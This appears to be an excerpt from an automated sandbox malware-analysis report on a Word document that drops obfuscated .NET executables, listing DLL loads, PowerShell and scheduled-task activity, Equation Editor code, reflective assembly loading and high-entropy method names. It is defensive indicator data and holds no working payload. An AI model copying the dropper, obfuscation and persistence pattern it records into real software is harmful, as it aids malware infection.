Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: secur32.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\taskeng.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\taskeng.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\taskeng.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\taskeng.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\taskeng.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: credssp.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: rpcrtremote.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Section loaded: gpapi.dll

Source: C:\Users\user\AppData\Roaming\swagodi78811.scr

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Source: order072724.docx.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\order072724.docx.doc

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\swagodi78811.scr

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: order072724.docx.doc

Initial sample: OLE zip file path = word/_rels/settings.xml.rels

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: lxqb.pdbSHA256 source: swagodi78811.scr.9.dr, gRpkBp.exe.10.dr, swagodi[1].scr.9.dr
Source:	Binary string: lxqb.pdb source: swagodi78811.scr.9.dr, gRpkBp.exe.10.dr, swagodi[1].scr.9.dr

Source: order072724.docx.doc

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: swagodi[1].scr.9.dr, frmMain.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: swagodi78811.scr.9.dr, frmMain.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: gRpkBp.exe.10.dr, frmMain.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 10.2.swagodi78811.scr.620000.0.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 10.2.swagodi78811.scr.620000.0.raw.unpack, PingPong.cs	.Net Code: Justy
Source: 10.2.swagodi78811.scr.2127a8c.3.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 10.2.swagodi78811.scr.2127a8c.3.raw.unpack, PingPong.cs	.Net Code: Justy
Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, fgdXJt4fnOeV6XjIJC.cs	.Net Code: JKVNGoEM53 System.Reflection.Assembly.Load(byte[])
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, fgdXJt4fnOeV6XjIJC.cs	.Net Code: JKVNGoEM53 System.Reflection.Assembly.Load(byte[])
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, fgdXJt4fnOeV6XjIJC.cs	.Net Code: JKVNGoEM53 System.Reflection.Assembly.Load(byte[])

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_0055C152 pushad ; retn 0055h		9_2_0055C209
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_00558F60 push eax; retf		9_2_00558F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_005501F4 push eax; retf		9_2_005501F5
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0020D6DC pushad ; iretd		20_2_0020D6E1
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 22_2_0025BEF0 push esp; iretd		22_2_0025BEF5

Source: swagodi[1].scr.9.dr	Static PE information: section name: .text entropy: 7.981247900601898
Source: swagodi78811.scr.9.dr	Static PE information: section name: .text entropy: 7.981247900601898
Source: gRpkBp.exe.10.dr	Static PE information: section name: .text entropy: 7.981247900601898

Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, j3BhvJfAOoaHD0q32a.cs	High entropy of concatenated method names: 'oCj2eDBcCM', 'JaW2iA9Shr', 'ddt2ClWngX', 'FIY2aAsKsC', 'p1U2ciuS8Z', 'W8a2R6Qk6O', 'RK22m0CAQS', 'VH823G70HW', 'rZE2MquQ1x', 'xS42oL7F1b'
Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, HJDXHuKnd7XJBuPZf8.cs	High entropy of concatenated method names: 'VQwabmJbTU', 'YA1apxOieF', 'PDpC1Jwrfu', 'p4qCvpYjob', 'ELPCsoNZJB', 'Y3mCSof5J3', 'DE0ChOHF2L', 'EMICI31HMa', 'YcKCk7pH9G', 'XeFCB6xw5g'
Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, qQF8AtuGm7BarQ18w7.cs	High entropy of concatenated method names: 'osJGfVktE', 'yijtXqxT0', 'H9dlqJ1vP', 'l0tpnoGrT', 'hiFw20lAp', 'nnm8PcMMq', 'rguij3rCiOn6f9gJi0', 'PB6ujyyY1f7AbyHI8I', 'p7p2OvtQZ', 'ksLWAKYLu'
Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, z6pv7rdU5kvjgZPMj0.cs	High entropy of concatenated method names: 'Dispose', 'nW9fJC7Y49', 'DbSyqXsEqa', 'F4S44OKEic', 'dBqf5eebKK', 'bmCfzmgl0C', 'ProcessDialogKey', 'Em9ygDklGk', 'oUryfpdjQR', 'SSUyySyXDq'
Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, FUjasOohxIjsRf91GS.cs	High entropy of concatenated method names: 'QY7iYDoJHp', 'HGniXUdcD2', 'qaeiDhlvpC', 'fXZindkmGt', 'Qdbi7EY5ul', 'yFjiHZXGLb', 'VkgiTNqoxL', 'mt3irTCkBH', 'po4iJKsJYx', 'WkKi5YeoWS'
Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, j8Qml7kLfnNplRy1hI.cs	High entropy of concatenated method names: 'DOt2KMq3tY', 'rcR2qVb5bW', 'pOH21Mf1R0', 'KYX2vQlNAY', 'Clc2Y9w2VL', 'Usq2sk1HZ1', 'Next', 'Next', 'Next', 'NextBytes'
Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, EBUmNYVABALmIokp9f.cs	High entropy of concatenated method names: 'Y0wReJBW83', 'kRIRCa3nF5', 'DBGRcmxh28', 'qUSc57WdB3', 'Twacz4txuK', 'aQZRg4qWQl', 'iJRRfmHiMd', 'FpLRymxihp', 'HHDR0n8o0R', 'RIDRNVvTaT'
Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, fgdXJt4fnOeV6XjIJC.cs	High entropy of concatenated method names: 'aZF0EdgrJe', 'XCE0eNq9fR', 'oh80iGKxUq', 'Gcd0CnkGDE', 'QoV0ai0QbB', 'BaS0cwTBbG', 'QVt0Rd984F', 'Ctb0m4CNRf', 'XG403njMfh', 'G1b0MNIsyQ'
Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, vPbiHgzJKkLT4EtXh3.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PbYuFdJMwo', 'CjcuZxY51I', 'GP4udf1xpT', 'Coau61FgV5', 'Vavu2BTrfo', 'KfQuuIFyY8', 'KcwuWRKZn4'
Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, OK3X7QZlBJ2Zm72Re2.cs	High entropy of concatenated method names: 'W5dcEHYqZd', 'u04ciTu9P4', 'IjUcak9BTV', 'wPicRDNdtP', 'AtkcmSDl9T', 'JRUa7jb0e8', 'xhyaHNAwU7', 'dIEaTR3t5S', 'RRfarKYrOd', 'dE2aJjBOcd'
Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, BxSxBGjWdM9kRNhawOJ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uLyWYQt1J1', 'ntAWXjb1oF', 'tMbWDQXAA4', 'yyvWnOhsqR', 'xwMW7b4QF9', 'u9LWH62pAZ', 'w5BWTq7rLQ'
Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, MyqKeWG6lullt0slAL.cs	High entropy of concatenated method names: 'qoTfRfySDo', 'WDUfmARhGB', 'D5DfMTcmKU', 'hpvfoT1iK1', 'gJpfZgtP6h', 'KQHfduWWyQ', 'rpcRSoIBQ57BUDmqdc', 'pt9w83Gsp9iPf1InfV', 'FcEnRUpTEb5MKOcRhJ', 's4xff3HfnC'
Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, EAjgrar6JjgJlO01q9.cs	High entropy of concatenated method names: 'aSRFjlyn2x', 'vxRFwAFjdh', 'jryFKcHqba', 'fHVFqHDoJF', 'UK6FvAkYsr', 'LDgFsd5Y1Q', 'NYIFhi8moa', 'mf8FIVq6Fn', 'lduFBZwfXs', 'hBwFAIj86Z'
Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, Ii3oNOI3i98I4b04u6.cs	High entropy of concatenated method names: 'XP4CtRh3Rw', 'uk8Cl6BJ4p', 'Ov5Cj5O8Un', 'PEhCwQyQDa', 'd4PCZqsr3O', 'adOCdCmPCL', 'r8JC6TUyKA', 'JacC2ZdWhA', 'FniCurWda9', 'CSLCW1I9nQ'
Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, bAbhZUjcvmmSaJhbsMu.cs	High entropy of concatenated method names: 'a1QuL0NrFj', 'ONVuPaqeba', 'INZuG8RCQ2', 'VKZutCaFmt', 'WfLub5VBqG', 'w6huld8LP4', 'W9Hup6uLp7', 'lPLujRbM8p', 'vh6uwnK1Dx', 'ba9u8JVBns'
Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, pTdTlrEvmDRRL24B7c.cs	High entropy of concatenated method names: 'qdRRLd68xx', 'lYIRPM5JdT', 'v2NRGGqMUw', 'E0NRtcHWQm', 'XKCRbYYOpw', 'KGORlovOAo', 'ke6Rp4c9Iy', 'QlqRjDVbOK', 'qC3RwabaDR', 'ResR8jShpu'
Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, VbQFPTPSSxlurm7Wrc.cs	High entropy of concatenated method names: 'ToString', 'cmUdAoPhyV', 'yUYdqR2gjr', 'PQBd1RjlCh', 'xXmdvsCk0W', 'o8adscFbKZ', 'QMydS4V73y', 'VP3dhSoxI5', 'KwCdIb2vYd', 'q7FdkcfdiR'
Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, dbodLQg9g3GrmB8wGu.cs	High entropy of concatenated method names: 'FwMufWDisn', 'uFUu0XS7Hm', 'spAuNCsuSQ', 'wgFueLJeUB', 'JmTuicD9Bv', 'X45uai6KN5', 'x22ucnVePH', 'xkB2T8DDnE', 'cFQ2rxbPH5', 'Syo2JdYRsB'
Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, QQ1L22qkxrIU3E6iOb.cs	High entropy of concatenated method names: 'cTOZBFPV2q', 'wGAZVtmrmD', 'RLGZYVLWlq', 'NeFZXcUB27', 'tWiZqouw15', 'kDxZ10LenO', 'acJZvcUTuS', 'GflZs32HuT', 'kNFZSQcZoH', 'AkUZhGN0MA'
Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, vOisVsp2ujdyCRDr6Q.cs	High entropy of concatenated method names: 'K2J6rGwcc3', 'rT265rhMrY', 'gaI2gntTs8', 'apL2fUpbUs', 'I0M6AwqGw8', 'Quj6VvdrUi', 'i1m6xnhB7E', 'xhH6YkTWZT', 'RT56XrsYb3', 'q5u6DgDon5'
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, j3BhvJfAOoaHD0q32a.cs	High entropy of concatenated method names: 'oCj2eDBcCM', 'JaW2iA9Shr', 'ddt2ClWngX', 'FIY2aAsKsC', 'p1U2ciuS8Z', 'W8a2R6Qk6O', 'RK22m0CAQS', 'VH823G70HW', 'rZE2MquQ1x', 'xS42oL7F1b'
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, HJDXHuKnd7XJBuPZf8.cs	High entropy of concatenated method names: 'VQwabmJbTU', 'YA1apxOieF', 'PDpC1Jwrfu', 'p4qCvpYjob', 'ELPCsoNZJB', 'Y3mCSof5J3', 'DE0ChOHF2L', 'EMICI31HMa', 'YcKCk7pH9G', 'XeFCB6xw5g'
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, qQF8AtuGm7BarQ18w7.cs	High entropy of concatenated method names: 'osJGfVktE', 'yijtXqxT0', 'H9dlqJ1vP', 'l0tpnoGrT', 'hiFw20lAp', 'nnm8PcMMq', 'rguij3rCiOn6f9gJi0', 'PB6ujyyY1f7AbyHI8I', 'p7p2OvtQZ', 'ksLWAKYLu'
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, z6pv7rdU5kvjgZPMj0.cs	High entropy of concatenated method names: 'Dispose', 'nW9fJC7Y49', 'DbSyqXsEqa', 'F4S44OKEic', 'dBqf5eebKK', 'bmCfzmgl0C', 'ProcessDialogKey', 'Em9ygDklGk', 'oUryfpdjQR', 'SSUyySyXDq'
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, FUjasOohxIjsRf91GS.cs	High entropy of concatenated method names: 'QY7iYDoJHp', 'HGniXUdcD2', 'qaeiDhlvpC', 'fXZindkmGt', 'Qdbi7EY5ul', 'yFjiHZXGLb', 'VkgiTNqoxL', 'mt3irTCkBH', 'po4iJKsJYx', 'WkKi5YeoWS'
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, j8Qml7kLfnNplRy1hI.cs	High entropy of concatenated method names: 'DOt2KMq3tY', 'rcR2qVb5bW', 'pOH21Mf1R0', 'KYX2vQlNAY', 'Clc2Y9w2VL', 'Usq2sk1HZ1', 'Next', 'Next', 'Next', 'NextBytes'
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, EBUmNYVABALmIokp9f.cs	High entropy of concatenated method names: 'Y0wReJBW83', 'kRIRCa3nF5', 'DBGRcmxh28', 'qUSc57WdB3', 'Twacz4txuK', 'aQZRg4qWQl', 'iJRRfmHiMd', 'FpLRymxihp', 'HHDR0n8o0R', 'RIDRNVvTaT'
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, fgdXJt4fnOeV6XjIJC.cs	High entropy of concatenated method names: 'aZF0EdgrJe', 'XCE0eNq9fR', 'oh80iGKxUq', 'Gcd0CnkGDE', 'QoV0ai0QbB', 'BaS0cwTBbG', 'QVt0Rd984F', 'Ctb0m4CNRf', 'XG403njMfh', 'G1b0MNIsyQ'
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, vPbiHgzJKkLT4EtXh3.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PbYuFdJMwo', 'CjcuZxY51I', 'GP4udf1xpT', 'Coau61FgV5', 'Vavu2BTrfo', 'KfQuuIFyY8', 'KcwuWRKZn4'
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, OK3X7QZlBJ2Zm72Re2.cs	High entropy of concatenated method names: 'W5dcEHYqZd', 'u04ciTu9P4', 'IjUcak9BTV', 'wPicRDNdtP', 'AtkcmSDl9T', 'JRUa7jb0e8', 'xhyaHNAwU7', 'dIEaTR3t5S', 'RRfarKYrOd', 'dE2aJjBOcd'
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, BxSxBGjWdM9kRNhawOJ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uLyWYQt1J1', 'ntAWXjb1oF', 'tMbWDQXAA4', 'yyvWnOhsqR', 'xwMW7b4QF9', 'u9LWH62pAZ', 'w5BWTq7rLQ'
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, MyqKeWG6lullt0slAL.cs	High entropy of concatenated method names: 'qoTfRfySDo', 'WDUfmARhGB', 'D5DfMTcmKU', 'hpvfoT1iK1', 'gJpfZgtP6h', 'KQHfduWWyQ', 'rpcRSoIBQ57BUDmqdc', 'pt9w83Gsp9iPf1InfV', 'FcEnRUpTEb5MKOcRhJ', 's4xff3HfnC'
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, EAjgrar6JjgJlO01q9.cs	High entropy of concatenated method names: 'aSRFjlyn2x', 'vxRFwAFjdh', 'jryFKcHqba', 'fHVFqHDoJF', 'UK6FvAkYsr', 'LDgFsd5Y1Q', 'NYIFhi8moa', 'mf8FIVq6Fn', 'lduFBZwfXs', 'hBwFAIj86Z'
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, Ii3oNOI3i98I4b04u6.cs	High entropy of concatenated method names: 'XP4CtRh3Rw', 'uk8Cl6BJ4p', 'Ov5Cj5O8Un', 'PEhCwQyQDa', 'd4PCZqsr3O', 'adOCdCmPCL', 'r8JC6TUyKA', 'JacC2ZdWhA', 'FniCurWda9', 'CSLCW1I9nQ'
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, bAbhZUjcvmmSaJhbsMu.cs	High entropy of concatenated method names: 'a1QuL0NrFj', 'ONVuPaqeba', 'INZuG8RCQ2', 'VKZutCaFmt', 'WfLub5VBqG', 'w6huld8LP4', 'W9Hup6uLp7', 'lPLujRbM8p', 'vh6uwnK1Dx', 'ba9u8JVBns'
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, pTdTlrEvmDRRL24B7c.cs	High entropy of concatenated method names: 'qdRRLd68xx', 'lYIRPM5JdT', 'v2NRGGqMUw', 'E0NRtcHWQm', 'XKCRbYYOpw', 'KGORlovOAo', 'ke6Rp4c9Iy', 'QlqRjDVbOK', 'qC3RwabaDR', 'ResR8jShpu'
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, VbQFPTPSSxlurm7Wrc.cs	High entropy of concatenated method names: 'ToString', 'cmUdAoPhyV', 'yUYdqR2gjr', 'PQBd1RjlCh', 'xXmdvsCk0W', 'o8adscFbKZ', 'QMydS4V73y', 'VP3dhSoxI5', 'KwCdIb2vYd', 'q7FdkcfdiR'
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, dbodLQg9g3GrmB8wGu.cs	High entropy of concatenated method names: 'FwMufWDisn', 'uFUu0XS7Hm', 'spAuNCsuSQ', 'wgFueLJeUB', 'JmTuicD9Bv', 'X45uai6KN5', 'x22ucnVePH', 'xkB2T8DDnE', 'cFQ2rxbPH5', 'Syo2JdYRsB'
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, QQ1L22qkxrIU3E6iOb.cs	High entropy of concatenated method names: 'cTOZBFPV2q', 'wGAZVtmrmD', 'RLGZYVLWlq', 'NeFZXcUB27', 'tWiZqouw15', 'kDxZ10LenO', 'acJZvcUTuS', 'GflZs32HuT', 'kNFZSQcZoH', 'AkUZhGN0MA'
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, vOisVsp2ujdyCRDr6Q.cs	High entropy of concatenated method names: 'K2J6rGwcc3', 'rT265rhMrY', 'gaI2gntTs8', 'apL2fUpbUs', 'I0M6AwqGw8', 'Quj6VvdrUi', 'i1m6xnhB7E', 'xhH6YkTWZT', 'RT56XrsYb3', 'q5u6DgDon5'
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, j3BhvJfAOoaHD0q32a.cs	High entropy of concatenated method names: 'oCj2eDBcCM', 'JaW2iA9Shr', 'ddt2ClWngX', 'FIY2aAsKsC', 'p1U2ciuS8Z', 'W8a2R6Qk6O', 'RK22m0CAQS', 'VH823G70HW', 'rZE2MquQ1x', 'xS42oL7F1b'
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, HJDXHuKnd7XJBuPZf8.cs	High entropy of concatenated method names: 'VQwabmJbTU', 'YA1apxOieF', 'PDpC1Jwrfu', 'p4qCvpYjob', 'ELPCsoNZJB', 'Y3mCSof5J3', 'DE0ChOHF2L', 'EMICI31HMa', 'YcKCk7pH9G', 'XeFCB6xw5g'
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, qQF8AtuGm7BarQ18w7.cs	High entropy of concatenated method names: 'osJGfVktE', 'yijtXqxT0', 'H9dlqJ1vP', 'l0tpnoGrT', 'hiFw20lAp', 'nnm8PcMMq', 'rguij3rCiOn6f9gJi0', 'PB6ujyyY1f7AbyHI8I', 'p7p2OvtQZ', 'ksLWAKYLu'
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, z6pv7rdU5kvjgZPMj0.cs	High entropy of concatenated method names: 'Dispose', 'nW9fJC7Y49', 'DbSyqXsEqa', 'F4S44OKEic', 'dBqf5eebKK', 'bmCfzmgl0C', 'ProcessDialogKey', 'Em9ygDklGk', 'oUryfpdjQR', 'SSUyySyXDq'
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, FUjasOohxIjsRf91GS.cs	High entropy of concatenated method names: 'QY7iYDoJHp', 'HGniXUdcD2', 'qaeiDhlvpC', 'fXZindkmGt', 'Qdbi7EY5ul', 'yFjiHZXGLb', 'VkgiTNqoxL', 'mt3irTCkBH', 'po4iJKsJYx', 'WkKi5YeoWS'
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, j8Qml7kLfnNplRy1hI.cs	High entropy of concatenated method names: 'DOt2KMq3tY', 'rcR2qVb5bW', 'pOH21Mf1R0', 'KYX2vQlNAY', 'Clc2Y9w2VL', 'Usq2sk1HZ1', 'Next', 'Next', 'Next', 'NextBytes'
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, EBUmNYVABALmIokp9f.cs	High entropy of concatenated method names: 'Y0wReJBW83', 'kRIRCa3nF5', 'DBGRcmxh28', 'qUSc57WdB3', 'Twacz4txuK', 'aQZRg4qWQl', 'iJRRfmHiMd', 'FpLRymxihp', 'HHDR0n8o0R', 'RIDRNVvTaT'
